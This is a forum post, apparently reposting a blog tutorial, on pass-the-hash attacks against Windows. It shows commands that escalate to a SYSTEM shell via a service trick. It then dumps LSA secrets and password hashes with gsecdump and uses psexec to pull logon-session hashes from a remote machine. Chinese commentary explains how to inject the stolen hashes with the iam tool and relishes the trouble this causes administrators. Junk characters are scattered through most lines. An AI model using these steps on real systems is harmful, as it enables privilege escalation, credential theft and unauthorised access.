找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2023|回复: 0
打印 上一主题 下一主题

HASH注入式攻击

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-6 21:09:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
o get a DOS Prompt as NT system:4 I* ^# C4 i! i5 [, c2 V/ U

2 d6 N  J5 g$ C0 nC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
6 ]& k% z' o, D[SC] CreateService SUCCESS( q6 F; s2 s! Q& i6 E& G: E

: v; @0 v" }+ [' L( ~/ a4 z. C5 eC:\>sc start shellcmdline9 G- F. V1 y+ o: H, p+ Y
[SC] StartService FAILED 1053:
& X- w7 C4 {0 |) f1 E8 c5 F' C) M' p5 K; L" w* b9 V! |$ l9 k
The service did not respond to the start or control request in a timely fashion.1 O2 _. P# p9 T$ x. q& r2 _( r

# w* m! s8 c3 ]2 pC:\>sc delete shellcmdline7 f+ C2 t4 R; }% ~
[SC] DeleteService SUCCESS8 d6 N9 P$ g+ @% F1 {' f. W+ w
2 g$ Z! l7 S- o/ W
------------
, A' X2 c% X' b& C# P% a
' ?1 r; f' c& r" Z; o: P$ O% wThen in the new DOS window:
/ D# E9 Q% V0 Q4 P. G- B1 y  Q3 c  A, h- o; @6 S
Microsoft Windows XP [Version 5.1.2600]
! I2 _) {) m4 q1 u* a8 O; J(C) Copyright 1985-2001 Microsoft Corp.- s2 K/ e0 D6 A) r

* p, n4 o! Q1 Z) H: lC:\WINDOWS\system32>whoami, x6 T# b# d8 [0 Y- l, ~
NT AUTHORITY\SYSTEM8 A0 U& p/ n1 s

( p0 B6 z* _; ~- uC:\WINDOWS\system32>gsecdump -h
) @  t0 @5 V* V+ X1 Agsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
) e) |' J. V; vusage: gsecdump [options]! C4 t: A# q9 C4 h. m
- }/ q( F; z5 T
options:. s6 v: Q* C  ^. w) f
-h [ --help ] show help
+ w$ G$ q* e1 r# V-a [ --dump_all ] dump all secrets% J. S5 _# r: y7 V6 c
-l [ --dump_lsa ] dump lsa secrets* W4 t- s0 E4 Q+ m! |
-w [ --dump_wireless ] dump microsoft wireless connections
' @4 O4 O! P) |-u [ --dump_usedhashes ] dump hashes from active logon sessions
' E: N- d. J* M, C, }. ]( R5 W9 p5 j-s [ --dump_hashes ] dump hashes from SAM/AD
' ]/ R2 ~0 [0 r" O' I" n/ O8 q4 f& \0 [5 }6 c+ p& y
Although I like to use:" u* i6 W2 o* c) m5 ?& M, Z

3 h5 {* u' D1 O5 j( yPsExec v1.83 - Execute processes remotely
3 C6 M. S2 g* J) S" k7 nCopyright (C) 2001-2007 Mark Russinovich9 p9 s2 r% R$ {% c& D% x
Sysinternals - 链接标记[url]www.sysinternals.com[/url]( D- l- p* H& W& l, t9 f' H+ F

% ^7 J# l1 T2 ?7 VC:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT; y4 P$ P5 M2 G/ ~. _7 l% q/ B% k
' g$ D: F- a# `5 Z8 E- N0 F3 B
to get the hashes from active logon sessions of a remote system.
( U0 O* o9 M5 _1 u5 N% i! `0 O8 Q" j7 e+ m; I. f
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.& I1 m" d; a' f* i

$ t! M7 w( u* I, r  T$ `3 q提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.1 l; A8 \3 i2 h% K( e
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
# Q6 a9 D: b: {3 ~& V- C; h& k% L, h2 k) u6 b* Y
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。) p' P: W3 ]. a4 `2 X% e0 f  {
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表